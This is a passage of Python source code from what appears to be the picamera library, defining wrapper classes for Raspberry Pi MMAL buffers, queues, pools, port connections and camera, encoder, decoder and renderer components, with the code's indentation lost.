Alternatively you can use the :attr:`data` property directly, which returns
and modifies the buffer's data as a :class:`bytes` object (note this is
generally slower than using the buffer object unless you are simply
replacing the entire buffer)::
def callback(port, buf):
# the buffer contents as a byte-string
print(buf.data)
"""
__slots__ = ('_buf',)
def __init__(self, buf):
super(MMALBuffer, self).__init__()
self._buf = buf
def _get_command(self):
return self._buf[0].cmd
def _set_command(self, value):
self._buf[0].cmd = value
command = property(_get_command, _set_command, doc="""\
The command set in the buffer's meta-data. This is usually 0 for
buffers returned by an encoder; typically this is only used by buffers
sent to the callback of a control port.
""")
def _get_flags(self):
return self._buf[0].flags
def _set_flags(self, value):
self._buf[0].flags = value
flags = property(_get_flags, _set_flags, doc="""\
The flags set in the buffer's meta-data, returned as a bitmapped
integer. Typical flags include:
* ``MMAL_BUFFER_HEADER_FLAG_EOS`` -- end of stream
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_START`` -- start of frame data
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_END`` -- end of frame data
* ``MMAL_BUFFER_HEADER_FLAG_KEYFRAME`` -- frame is a key-frame
* ``MMAL_BUFFER_HEADER_FLAG_FRAME`` -- frame data
* ``MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO`` -- motion estimatation data
""")
def _get_pts(self):
return self._buf[0].pts
def _set_pts(self, value):
self._buf[0].pts = value
pts = property(_get_pts, _set_pts, doc="""\
The presentation timestamp (PTS) of the buffer, as an integer number
of microseconds or ``MMAL_TIME_UNKNOWN``.
""")
def _get_dts(self):
return self._buf[0].dts
def _set_dts(self, value):
self._buf[0].dts = value
dts = property(_get_dts, _set_dts, doc="""\
The decoding timestamp (DTS) of the buffer, as an integer number of
microseconds or ``MMAL_TIME_UNKNOWN``.
""")
@property
def size(self):
"""
Returns the length of the buffer's data area in bytes. This will be
greater than or equal to :attr:`length` and is fixed in value.
"""
return self._buf[0].alloc_size
def _get_offset(self):
return self._buf[0].offset
def _set_offset(self, value):
assert 0 <= value <= self.size
self._buf[0].offset = value
self.length = min(self.size - self.offset, self.length)
offset = property(_get_offset, _set_offset, doc="""\
The offset from the start of the buffer at which the data actually
begins. Defaults to 0. If this is set to a value which would force the
current :attr:`length` off the end of the buffer's :attr:`size`, then
:attr:`length` will be decreased automatically.
""")
def _get_length(self):
return self._buf[0].length
def _set_length(self, value):
assert 0 <= value <= self.size - self.offset
self._buf[0].length = value
length = property(_get_length, _set_length, doc="""\
The length of data held in the buffer. Must be less than or equal to
the allocated size of data held in :attr:`size` minus the data
:attr:`offset`. This attribute can be used to effectively blank the
buffer by setting it to zero.
""")
def _get_data(self):
with self as buf:
return ct.string_at(
ct.byref(buf, self._buf[0].offset),
self._buf[0].length)
def _set_data(self, value):
value_len = buffer_bytes(value)
if value_len:
if value_len > self.size:
raise PiCameraValueError(
'data is too large for buffer (%d > %d)' % (
value_len, self.size))
bp = ct.c_uint8 * value_len
try:
sp = bp.from_buffer(value)
except TypeError:
sp = bp.from_buffer_copy(value)
with self as buf:
ct.memmove(buf, sp, value_len)
self._buf[0].offset = 0
self._buf[0].length = value_len
data = property(_get_data, _set_data, doc="""\
The data held in the buffer as a :class:`bytes` string. You can set
this attribute to modify the data in the buffer. Acceptable values
are anything that supports the buffer protocol, and which contains
:attr:`size` bytes or less. Setting this attribute implicitly modifies
the :attr:`length` attribute to the length of the specified value and
sets :attr:`offset` to zero.
.. note::
Accessing a buffer's data via this attribute is relatively slow
(as it copies the buffer's data to/from Python objects). See the
:class:`MMALBuffer` documentation for details of a faster (but
more complex) method.
""")
def replicate(self, source):
"""
Replicates the *source* :class:`MMALBuffer`. This copies all fields
from the *source* buffer, including the internal :attr:`data` pointer.
In other words, after replication this buffer and the *source* buffer
will share the same block of memory for *data*.
The *source* buffer will also be referenced internally by this buffer
and will only be recycled once this buffer is released.
.. note::
This is fundamentally different to the operation of the
:meth:`copy_from` method. It is much faster, but imposes the burden
that two buffers now share data (the *source* cannot be released
until the replicant has been released).
"""
mmal_check(
mmal.mmal_buffer_header_replicate(self._buf, source._buf),
prefix='unable to replicate buffer')
def copy_from(self, source):
"""
Copies all fields (including data) from the *source*
:class:`MMALBuffer`. This buffer must have sufficient :attr:`size` to
store :attr:`length` bytes from the *source* buffer. This method
implicitly sets :attr:`offset` to zero, and :attr:`length` to the
number of bytes copied.
.. note::
This is fundamentally different to the operation of the
:meth:`replicate` method. It is much slower, but afterward the
copied buffer is entirely independent of the *source*.
"""
assert self.size >= source.length
source_len = source._buf[0].length
if source_len:
with self as target_buf, source as source_buf:
ct.memmove(target_buf, ct.byref(source_buf, source.offset), source_len)
self._buf[0].offset = 0
self._buf[0].length = source_len
self.copy_meta(source)
def copy_meta(self, source):
"""
Copy meta-data from the *source* :class:`MMALBuffer`; specifically this
copies all buffer fields with the exception of :attr:`data`,
:attr:`length` and :attr:`offset`.
"""
self._buf[0].cmd = source._buf[0].cmd
self._buf[0].flags = source._buf[0].flags
self._buf[0].dts = source._buf[0].dts
self._buf[0].pts = source._buf[0].pts
self._buf[0].type[0] = source._buf[0].type[0]
def acquire(self):
"""
Acquire a reference to the buffer. This will prevent the buffer from
being recycled until :meth:`release` is called. This method can be
called multiple times in which case an equivalent number of calls
to :meth:`release` must be made before the buffer will actually be
released.
"""
mmal.mmal_buffer_header_acquire(self._buf)
def release(self):
"""
Release a reference to the buffer. This is the opposing call to
:meth:`acquire`. Once all references have been released, the buffer
will be recycled.
"""
mmal.mmal_buffer_header_release(self._buf)
def reset(self):
"""
Resets all buffer header fields to default values.
"""
mmal.mmal_buffer_header_reset(self._buf)
def __enter__(self):
mmal_check(
mmal.mmal_buffer_header_mem_lock(self._buf),
prefix='unable to lock buffer header memory')
return ct.cast(
self._buf[0].data,
ct.POINTER(ct.c_uint8 * self._buf[0].alloc_size)).contents
def __exit__(self, *exc):
mmal.mmal_buffer_header_mem_unlock(self._buf)
return False
def __repr__(self):
if self._buf is not None:
return '<MMALBuffer object: flags=%s command=%s length=%d>' % (
''.join((
'S' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_START else '_',
'E' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END else '_',
'K' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_KEYFRAME else '_',
'C' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CONFIG else '_',
'M' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO else '_',
'X' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_EOS else '_',
)), {
0: 'none',
mmal.MMAL_EVENT_ERROR: 'error',
mmal.MMAL_EVENT_FORMAT_CHANGED: 'format-change',
mmal.MMAL_EVENT_PARAMETER_CHANGED: 'param-change',
mmal.MMAL_EVENT_EOS: 'end-of-stream',
}[self.command], self.length)
else:
return '<MMALBuffer object: ???>'
class MMALQueue(object):
"""
Represents an MMAL buffer queue. Buffers can be added to the queue with the
:meth:`put` method, and retrieved from the queue (with optional wait
timeout) with the :meth:`get` method.
"""
__slots__ = ('_queue', '_created')
def __init__(self, queue):
self._created = False
self._queue = queue
@classmethod
def create(cls):
self = cls(mmal.mmal_queue_create())
self._created = True
return self
def close(self):
if self._created:
mmal_queue_destroy(self._queue)
self._queue = None
def __len__(self):
return mmal.mmal_queue_length(self._queue)
def get(self, block=True, timeout=None):
"""
Get the next buffer from the queue. If *block* is ``True`` (the default)
and *timeout* is ``None`` (the default) then the method will block
until a buffer is available. Otherwise *timeout* is the maximum time to
wait (in seconds) for a buffer to become available. If a buffer is not
available before the timeout expires, the method returns ``None``.
Likewise, if *block* is ``False`` and no buffer is immediately
available then ``None`` is returned.
"""
if block and timeout is None:
buf = mmal.mmal_queue_wait(self._queue)
elif block and timeout is not None:
buf = mmal.mmal_queue_timedwait(self._queue, int(timeout * 1000))
else:
buf = mmal.mmal_queue_get(self._queue)
if buf:
return MMALBuffer(buf)
def put(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the back of the queue.
"""
mmal.mmal_queue_put(self._queue, buf._buf)
def put_back(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the front of the queue. This is
used when a buffer was removed from the queue but needs to be put
back at the front where it was originally taken from.
"""
mmal.mmal_queue_put_back(self._queue, buf._buf)
class MMALPool(object):
"""
Represents an MMAL pool containing :class:`MMALBuffer` objects. All active
ports are associated with a pool of buffers, and a queue. Instances can be
treated as a sequence of :class:`MMALBuffer` objects but this is only
recommended for debugging purposes; otherwise, use the :meth:`get_buffer`,
:meth:`send_buffer`, and :meth:`send_all_buffers` methods which work with
the encapsulated :class:`MMALQueue`.
"""
__slots__ = ('_pool', '_queue')
def __init__(self, pool):
self._pool = pool
super(MMALPool, self).__init__()
self._queue = MMALQueue(pool[0].queue)
def __len__(self):
return self._pool[0].headers_num
def __getitem__(self, index):
return MMALBuffer(self._pool[0].header[index])
@property
def queue(self):
"""
The :class:`MMALQueue` associated with the pool.
"""
return self._queue
def close(self):
if self._pool is not None:
mmal.mmal_pool_destroy(self._pool)
self._pool = None
def resize(self, new_count, new_size):
"""
Resizes the pool to contain *new_count* buffers with *new_size* bytes
allocated to each buffer.
*new_count* must be 1 or more (you cannot resize a pool to contain
no headers). However, *new_size* can be 0 which causes all payload
buffers to be released.
.. warning::
If the pool is associated with a port, the port must be disabled
when resizing the pool.
"""
mmal_check(
mmal.mmal_pool_resize(self._pool, new_count, new_size),
prefix='unable to resize pool')
def get_buffer(self, block=True, timeout=None):
"""
Get the next buffer from the pool's queue. See :meth:`MMALQueue.get`
for the meaning of the parameters.
"""
return self._queue.get(block, timeout)
def send_buffer(self, port, block=True, timeout=None):
"""
Get a buffer from the pool's queue and send it to *port*. *block* and
*timeout* act as they do in :meth:`get_buffer`. If no buffer is
available (for the values of *block* and *timeout*,
:exc:`~picamera.PiCameraMMALError` is raised).
"""
buf = self.get_buffer(block, timeout)
if buf is None:
raise PiCameraMMALError(mmal.MMAL_EAGAIN, 'no buffers available')
port.send_buffer(buf)
def send_all_buffers(self, port, block=True, timeout=None):
"""
Send all buffers from the queue to *port*. *block* and *timeout* act as
they do in :meth:`get_buffer`. If no buffer is available (for the
values of *block* and *timeout*, :exc:`~picamera.PiCameraMMALError` is
raised).
"""
for i in range(len(self._queue)):
self.send_buffer(port, block, timeout)
class MMALPortPool(MMALPool):
"""
Construct an MMAL pool for the number and size of buffers required by
the :class:`MMALPort` *port*.
"""
__slots__ = ('_port',)
def __init__(self, port):
pool = mmal.mmal_port_pool_create(
port._port, port._port[0].buffer_num, port._port[0].buffer_size)
if not pool:
raise PiCameraMMALError(
mmal.MMAL_ENOSPC,
'failed to create buffer header pool for port %s' % port.name)
super(MMALPortPool, self).__init__(pool)
self._port = port
def close(self):
if self._pool is not None:
mmal.mmal_port_pool_destroy(self._port._port, self._pool)
self._port = None
self._pool = None
super(MMALPortPool, self).close()
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_all_buffers(port, block, timeout)
class MMALBaseConnection(MMALObject):
"""
Abstract base class for :class:`MMALConnection` and
:class:`MMALPythonConnection`. Handles weakrefs to the source and
target ports, and format negotiation. All other connection details are
handled by the descendent classes.
"""
__slots__ = ('_source', '_target')
default_formats = ()
compatible_opaque_formats = {
('OPQV-single', 'OPQV-single'),
('OPQV-dual', 'OPQV-dual'),
('OPQV-strips', 'OPQV-strips'),
('OPQV-dual', 'OPQV-single'),
('OPQV-single', 'OPQV-dual'), # recent firmwares permit this
}
def __init__(
self, source, target, formats=default_formats):
super(MMALBaseConnection, self).__init__()
if not isinstance(source, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('source is not a port')
if not isinstance(target, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('target is not a port')
if source.type != mmal.MMAL_PORT_TYPE_OUTPUT:
raise PiCameraValueError('source is not an output port')
if target.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError('target is not an input port')
if source.connection is not None:
raise PiCameraValueError('source port is already connected')
if target.connection is not None:
raise PiCameraValueError('target port is already connected')
if formats is None:
formats = ()
self._source = source
self._target = target
try:
iter(formats)
except TypeError:
formats = (formats,)
self._negotiate_format(formats)
source._connection = self
target._connection = self
# Descendents continue with connection implementation...
def close(self):
if self._source is not None:
self._source._connection = None
self._source = None
if self._target is not None:
self._target._connection = None
self._target = None
def _negotiate_format(self, formats):
def copy_format():
self._source.commit()
self._target.copy_from(self._source)
self._target.commit()
def max_buffers():
self._source.buffer_count = self._target.buffer_count = max(
self._source.buffer_count, self._target.buffer_count)
self._source.buffer_size = self._target.buffer_size = max(
self._source.buffer_size, self._target.buffer_size)
# Filter out formats that aren't supported on both source and target
# ports. This is a little tricky as ports that support OPAQUE never
# claim they do (so we have to assume it's mutually supported)
mutually_supported = (
set(self._source.supported_formats) &
set(self._target.supported_formats)
) | {mmal.MMAL_ENCODING_OPAQUE}
formats = [f for f in formats if f in mutually_supported]
if formats:
# If there are any formats left to try, perform the negotiation
# with the filtered list. Again, there's some special casing to
# deal with the incompatible OPAQUE sub-formats
for f in formats:
if f == mmal.MMAL_ENCODING_OPAQUE:
if (self._source.opaque_subformat,
self._target.opaque_subformat) in self.compatible_opaque_formats:
self._source.format = mmal.MMAL_ENCODING_OPAQUE
else:
continue
else:
self._source.format = f
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
continue
else:
max_buffers()
return
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to negotiate port format')
else:
# If no formats are available to try (either from filtering or
# because none were given), assume the source port is set up
# properly. Just copy the format to the target and hope the caller
# knows what they're doing
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to copy source format to target port')
else:
max_buffers()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
@property
def source(self):
"""
The source :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._source
@property
def target(self):
"""
The target :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._target
class MMALConnection(MMALBaseConnection):
"""
Represents an MMAL internal connection between two components. The
constructor accepts arguments providing the *source* :class:`MMALPort` and
*target* :class:`MMALPort`.
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
.. note::
The default *formats* list starts with OPAQUE; the class understands
the different OPAQUE sub-formats (see :ref:`mmal` for more information)
and will only select OPAQUE if compatible sub-formats can be used on
both ports.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALConnection` object
sending the data, and the :class:`MMALBuffer` object containing data. The
callable may optionally manipulate the :class:`MMALBuffer` and return it
to permit it to continue traversing the connection, or return ``None``
in which case the buffer will be released.
.. note::
There is a significant performance penalty for specifying a
callback between MMAL components as it requires buffers to be
copied from the GPU's memory to the CPU's memory and back again.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_OPAQUE, MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between MMAL components.
"""
__slots__ = ('_connection', '_callback', '_wrapper')
default_formats = (
mmal.MMAL_ENCODING_OPAQUE,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not isinstance(source, MMALPort):
raise PiCameraValueError('source is not an MMAL port')
if not isinstance(target, MMALPort):
raise PiCameraValueError('target is not an MMAL port')
super(MMALConnection, self).__init__(source, target, formats)
self._connection = ct.POINTER(mmal.MMAL_CONNECTION_T)()
self._callback = callback
flags = mmal.MMAL_CONNECTION_FLAG_ALLOCATION_ON_INPUT
if callback is None:
flags |= mmal.MMAL_CONNECTION_FLAG_TUNNELLING
try:
mmal_check(
mmal.mmal_connection_create(
self._connection, source._port, target._port, flags),
prefix="Failed to create connection")
except:
self._connection = None
raise
def close(self):
if self._connection is not None:
mmal.mmal_connection_destroy(self._connection)
self._connection = None
self._wrapper = None
super(MMALConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return bool(self._connection[0].is_enabled)
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
def wrapper(connection):
buf = mmal.mmal_queue_get(connection[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
modified_buf = self._callback(self, buf)
except:
buf.release()
raise
else:
if modified_buf is not None:
try:
self._target.send_buffer(modified_buf)
except PiCameraPortDisabled:
# Target port disabled; ignore the error
pass
else:
buf.release()
return
buf = mmal.mmal_queue_get(connection[0].pool[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
self._source.send_buffer(buf)
except PiCameraPortDisabled:
# Source port has been disabled; ignore the error
pass
if self._callback is not None:
self._wrapper = mmal.MMAL_CONNECTION_CALLBACK_T(wrapper)
self._connection[0].callback = self._wrapper
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
mmal_check(
mmal.mmal_connection_enable(self._connection),
prefix="Failed to enable connection")
if self._callback is not None:
MMALPool(self._connection[0].pool).send_all_buffers(self._source)
def disable(self):
"""
Disables the connection.
"""
mmal_check(
mmal.mmal_connection_disable(self._connection),
prefix="Failed to disable connection")
self._wrapper = None
@property
def name(self):
return self._connection[0].name.decode('ascii')
def __repr__(self):
if self._connection is not None:
return '<MMALConnection "%s">' % self.name
else:
return '<MMALConnection closed>'
class MMALRawCamera(MMALBaseComponent):
"""
The MMAL "raw camera" component.
Don't use this! If you insist on using this anyway, read the forum post
about `raw sensor access`_ first.
.. raw sensor access: https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=109137
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_RAW_CAMERA
opaque_input_subformats = ()
opaque_output_subformats = ('OPQV-single',)
class MMALCamera(MMALBaseComponent):
"""
Represents the MMAL camera component. This component has 0 input ports and
3 output ports. The intended use of the output ports (which in turn
determines the behaviour of those ports) is as follows:
* Port 0 is intended for preview renderers
* Port 1 is intended for video recording
* Port 2 is intended for still image capture
Use the ``MMAL_PARAMETER_CAMERA_CONFIG`` parameter on the control port to
obtain and manipulate the camera's configuration.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA
opaque_output_subformats = ('OPQV-single', 'OPQV-dual', 'OPQV-strips')
annotate_structs = (
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V2_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V3_T,
)
def __init__(self):
global FIX_RGB_BGR_ORDER
super(MMALCamera, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] is None:
found = False
# try largest struct to smallest as later firmwares still happily
# accept earlier revision structures
# XXX do old firmwares reject too-large structs?
for struct in reversed(MMALCamera.annotate_structs):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = struct
self.control.params[mmal.MMAL_PARAMETER_ANNOTATE]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
if FIX_RGB_BGR_ORDER is None:
# old firmware lists BGR24 before RGB24 in supported_formats
for f in self.outputs[1].supported_formats:
if f == mmal.MMAL_ENCODING_BGR24:
FIX_RGB_BGR_ORDER = True
break
elif f == mmal.MMAL_ENCODING_RGB24:
FIX_RGB_BGR_ORDER = False
break
def _get_annotate_rev(self):
try:
return MMALCamera.annotate_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE]) + 1
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
def _set_annotate_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = MMALCamera.annotate_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera annotation structure revision")
annotate_rev = property(_get_annotate_rev, _set_annotate_rev, doc="""\
The annotation capabilities of the firmware have evolved over time and
several structures are available for querying and setting video
annotations. By default the :class:`MMALCamera` class will pick the
latest annotation structure supported by the current firmware but you
can select older revisions with :attr:`annotate_rev` for other purposes
(e.g. testing).
""")
class MMALCameraInfo(MMALBaseComponent):
"""
Represents the MMAL camera-info component. Query the
``MMAL_PARAMETER_CAMERA_INFO`` parameter on the control port to obtain
information about the connected camera module.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA_INFO
info_structs = (
mmal.MMAL_PARAMETER_CAMERA_INFO_T,
mmal.MMAL_PARAMETER_CAMERA_INFO_V2_T,
)
def __init__(self):
super(MMALCameraInfo, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] is None:
found = False
# try smallest structure to largest as later firmwares reject
# older structures
for struct in MMALCameraInfo.info_structs:
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = struct
self.control.params[mmal.MMAL_PARAMETER_CAMERA_INFO]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _get_info_rev(self):
try:
return MMALCameraInfo.info_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO]) + 1
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _set_info_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = MMALCameraInfo.info_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera info structure revision")
info_rev = property(_get_info_rev, _set_info_rev, doc="""\
The camera information capabilities of the firmware have evolved over
time and several structures are available for querying camera
information. When initialized, :class:`MMALCameraInfo` will attempt
to discover which structure is in use by the extant firmware. This
property can be used to discover the structure version and to modify
the version in use for other purposes (e.g. testing).
""")
class MMALComponent(MMALBaseComponent):
"""
Represents an MMAL component that acts as a filter of some sort, with a
single input that connects to an upstream source port. This is an asbtract
base class.
"""
__slots__ = ()
def __init__(self):
super(MMALComponent, self).__init__()
assert len(self.opaque_input_subformats) == 1
def close(self):
self.disconnect()
super(MMALComponent, self).close()
def enable(self):
super(MMALComponent, self).enable()
if self.connection is not None:
self.connection.enable()
def disable(self):
if self.connection is not None:
self.connection.disable()
super(MMALComponent, self).disable()
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
class MMALSplitter(MMALComponent):
"""
Represents the MMAL splitter component. This component has 1 input port
and 4 output ports which all generate duplicates of buffers passed to the
input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_SPLITTER
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = ('OPQV-single',) * 4
class MMALISPResizer(MMALComponent):
"""
Represents the MMAL ISP resizer component. This component has 1 input port
and 1 output port, and supports resizing via the VideoCore ISP, along with
conversion of numerous formats into numerous other formats (e.g. OPAQUE to
RGB, etc). This is more efficient than :class:`MMALResizer` but is only
available on later firmware versions.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_ISP
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = (None,)
class MMALResizer(MMALComponent):
"""
Represents the MMAL VPU resizer component. This component has 1 input port
and 1 output port. This supports resizing via the VPU. This is not as
efficient as :class:`MMALISPResizer` but is available on all firmware
verions. The output port can (and usually should) have a different frame
size to the input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_RESIZER
opaque_input_subformats = (None,)
opaque_output_subformats = (None,)
class MMALEncoder(MMALComponent):
"""
Represents a generic MMAL encoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoEncoder(MMALEncoder):
"""
Represents the MMAL video encoder component. This component has 1 input
port and 1 output port. The output port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_ENCODER
opaque_input_subformats = ('OPQV-dual',)
opaque_output_subformats = (None,)
class MMALImageEncoder(MMALEncoder):
"""
Represents the MMAL image encoder component. This component has 1 input
port and 1 output port. The output port is typically configured with
``MMAL_ENCODING_JPEG`` but can also use ``MMAL_ENCODING_PNG``,
``MMAL_ENCODING_GIF``, etc.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_ENCODER
opaque_input_subformats = ('OPQV-strips',)
opaque_output_subformats = (None,)
class MMALDecoder(MMALComponent):
"""
Represents a generic MMAL decoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoDecoder(MMALDecoder):
"""
Represents the MMAL video decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALImageDecoder(MMALDecoder):
"""
Represents the MMAL iamge decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_JPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALRenderer(MMALComponent):
"""
Represents the MMAL renderer component. This component has 1 input port and
0 output ports. It is used to implement the camera preview and overlays.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_RENDERER
opaque_input_subformats = ('OPQV-single',)
class MMALNullSink(MMALComponent):
"""
Represents the MMAL null-sink component. This component has 1 input port
and 0 output ports. It is used to keep the preview port "alive" (and thus
calculating white-balance and exposure) when the camera preview is not
required.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_NULL_SINK
opaque_input_subformats = ('OPQV-single',)
class MMALPythonPort(MMALObject):
"""
Implements ports for Python-based MMAL components.
"""
__slots__ = (
'_buffer_count',
'_buffer_size',
'_connection',
'_enabled',
'_owner',
'_pool',
'_type',
'_index',
'_supported_formats',
'_format',
'_callback',
)
_FORMAT_BPP = {
'I420': 1.5,
'RGB3': 3,
'RGBA': 4,
'BGR3': 3,
'BGRA': 4,
}
def __init__(self, owner, port_type, index):
self._buffer_count = 2
self._buffer_size = 0
self._connection = None
self._enabled = False
self._owner = weakref.ref(owner)
self._pool = None
self._callback = None
self._type = port_type
self._index = index
self._supported_formats = {
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
self._format = ct.pointer(mmal.MMAL_ES_FORMAT_T(
type=mmal.MMAL_ES_TYPE_VIDEO,
encoding=mmal.MMAL_ENCODING_I420,
es=ct.pointer(mmal.MMAL_ES_SPECIFIC_FORMAT_T())))
def close(self):
self.disconnect()
self.disable()
self._format = None
def __repr__(self):
return '<MMALPythonPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
self.name, mmal.FOURCC_str(self.format), self.buffer_count,
self.buffer_size, self.framesize, self.framerate)
def _get_bitrate(self):
return self._format[0].bitrate
def _set_bitrate(self, value):
self._format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def _get_supported_formats(self):
return self._supported_formats
def _set_supported_formats(self, value):
try:
value = {f for f in value}
except TypeError:
value = {value}
if not value:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "port must have at least one valid format")
self._supported_formats = value
